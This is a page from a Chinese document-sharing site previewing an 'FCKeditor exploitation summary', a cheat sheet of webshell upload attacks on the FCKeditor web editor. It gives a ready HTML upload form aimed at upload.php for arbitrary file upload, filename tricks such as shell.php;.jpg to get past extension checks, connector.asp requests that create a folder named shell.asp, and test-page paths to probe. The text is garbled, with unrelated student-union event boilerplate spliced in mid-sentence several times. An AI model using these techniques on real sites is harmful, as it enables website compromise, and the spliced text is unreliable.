欢迎来到天天文库
浏览记录
ID:27145831
大小:17.58 KB
页数:9页
时间:2018-12-01
《fckeditor漏洞利用总结》由会员上传分享,免费在线阅读,更多相关内容在应用文档-天天文库。
1、学生会成立以来,学生会搞了一系列的活动,而且都取得了较好的成绩。通过各部的相互努力,我们获得了不少经验。Fckeditor漏洞利用总结 查看编辑器版本 Fckeditor/_whatsnew.html ————————————————————————————————————————————————————————————— 2.Version2.2版本 Apache+linux环境下在上传文件后面加个.突破!测试通过。 ————————————————————————————————
2、————————————————————————————— 3.Version<=2.4.2Forphp在处理PHP上传的地方并未对media类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。 <formid="frmUpload"enctype="multipart/form-data"团结创新,尽现丰富多彩的课余生活1。庆祝##系成立之时,我们学生会举办了一次“邀明月,共成长,师生同欢”茶话会。职教系部分老师和我系全体教师以及各班班
3、委参加了此茶话会。学生会成立以来,学生会搞了一系列的活动,而且都取得了较好的成绩。通过各部的相互努力,我们获得了不少经验。 action="http://www.site.com/Fckeditor/editor/filemanager/upload/php/upload.php?Type=media"method="post">Uploadanewfile:<br> <inputtype="file"name="NewFile"size="50"><br&g
4、t; <inputid="btnUpload"type="submit"value="Upload"> </form> ————————————————————————————————————————————————————————————— 4.Fckeditor文件上传“.”变“_”下划线的绕过方法 很多时候上传的文件例如:shell.php.rar或shell.php;.jpg会变为shell_php;.jpg这是新版Fck的变化。 4.1:提交shell.
5、php+空格绕过 不过空格只支持win系统*nix是不支持的[shell.php和shell.php+空格是2个不同的文件未测试。团结创新,尽现丰富多彩的课余生活1。庆祝##系成立之时,我们学生会举办了一次“邀明月,共成长,师生同欢”茶话会。职教系部分老师和我系全体教师以及各班班委参加了此茶话会。学生会成立以来,学生会搞了一系列的活动,而且都取得了较好的成绩。通过各部的相互努力,我们获得了不少经验。 4.2:继续上传同名文件可变为shell.php;.jpg也可以新建一个文件夹,只检测了第一级的
6、目录,如果跳到二级目录就不受限制。 ————————————————————————————————————————————————————————————— 5.突破建立文件夹 Fckeditor/editor/filemanager/connectors/asp/connector.asp?command=createFolder&Type=Image¤tFolder=%2Fshell.asp&NewFolderName=z&uuid=84 F
7、ckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?command=createFolder¤tFolder=/&Type=Image&NewFolderName=shell.asp ————————————————————————————————————————————————————————————— 6.Fckeditor中test文件的上传地址团结创新,尽现丰
8、富多彩的课余生活1。庆祝##系成立之时,我们学生会举办了一次“邀明月,共成长,师生同欢”茶话会。职教系部分老师和我系全体教师以及各班班委参加了此茶话会。学生会成立以来,学生会搞了一系列的活动,而且都取得了较好的成绩。通过各部的相互努力,我们获得了不少经验。 Fckeditor/editor/filemanager/browser/default/connectors/test.html Fckeditor/editor/filemanager/upload/tes
此文档下载收益归作者所有